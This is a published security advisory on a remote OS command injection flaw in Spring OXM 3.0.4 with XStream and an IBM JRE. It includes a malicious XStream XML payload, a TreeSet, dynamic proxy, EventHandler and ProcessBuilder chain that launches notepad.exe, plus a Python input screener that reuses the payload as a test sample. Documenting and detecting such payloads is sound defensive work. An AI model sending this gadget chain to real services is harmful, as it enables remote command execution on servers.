Reference:
http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics
CVSS: 7.6
  AccessVector: Network
  AccessComplexity: High
  Authentication: None
  Confidentiality Impact: Complete
  Integrity Impact: Complete
  Availability Impact: Complete
Details:
Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.
This is an example of legitimate input:
<bicycle>
  <name>unicycle</name>
  <id>123</id>
  <nbrWheels>1</nbrWheels>
  <nbrRiders>1</nbrRiders>
</bicycle>
This malicious input executes the notepad application on the server and opens the
C:\Windows\win.ini file:
<bicycle class="java.util.TreeSet">
  <no-comparator />
  <object />
  <dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
      <target class="java.lang.ProcessBuilder">
        <command>
          <string>notepad.exe</string>
          <string>c:\windows\win.ini</string>
        </command>
      </target>
      <action>start</action>
    </handler>
  </dynamic-proxy>
</bicycle>
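Added example (not part of the original advisory, and not Spring or XStream code): a Python check that screens request bodies before they reach the unmarshaller and flags the type-override markers the malicious document above relies on, namely a class attribute and a dynamic-proxy element. The expected root name, the empty allowlist and the function name screen are assumptions made for this example.

```python
import xml.etree.ElementTree as ET

EXPECTED_ROOT = "bicycle"       # assumption: the only document type the service accepts
ALLOWED_CLASS_ATTRS = set()     # assumption: clients never need a class="..." type hint
PROXY_TAGS = {"dynamic-proxy"}  # XStream's element name for java.lang.reflect.Proxy


def screen(xml_text):
    """Return (path, reason) findings; an empty list means nothing was flagged."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("/", f"not well-formed: {exc}")]
    findings = []
    if root.tag != EXPECTED_ROOT:
        findings.append(("/" + root.tag, "unexpected root element"))

    def walk(elem, path):
        hint = elem.get("class")
        if hint is not None and hint not in ALLOWED_CLASS_ATTRS:
            findings.append((path, f"class attribute selects type {hint}"))
        if elem.tag in PROXY_TAGS:
            findings.append((path, "dynamic proxy element"))
        elif "." in elem.tag:
            # XStream resolves unaliased element names as Java class names.
            findings.append((path, "element name looks like a class name"))
        for child in elem:
            walk(child, f"{path}/{child.tag}")

    walk(root, "/" + root.tag)
    return findings


# Constructed samples, copied from the two documents in this advisory.
LEGITIMATE = ("<bicycle><name>unicycle</name><id>123</id>"
              "<nbrWheels>1</nbrWheels><nbrRiders>1</nbrRiders></bicycle>")
MALICIOUS = r"""<bicycle class="java.util.TreeSet"><no-comparator /><object />
<dynamic-proxy><interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder">
<command><string>notepad.exe</string><string>c:\windows\win.ini</string></command>
</target><action>start</action></handler></dynamic-proxy></bicycle>"""

if __name__ == "__main__":
    for name, doc in (("legitimate", LEGITIMATE), ("malicious", MALICIOUS)):
        print(name, screen(doc))
```

Input screening of this kind is a detection aid in front of the service; the fixed version still has to be deployed.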
Title: Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used
Advisory ID: SECURITYVULNS:DOC:26618
Published: 2011-07-06
Source: https://vulners.com/securityvulns/SECURITYVULNS:DOC:26618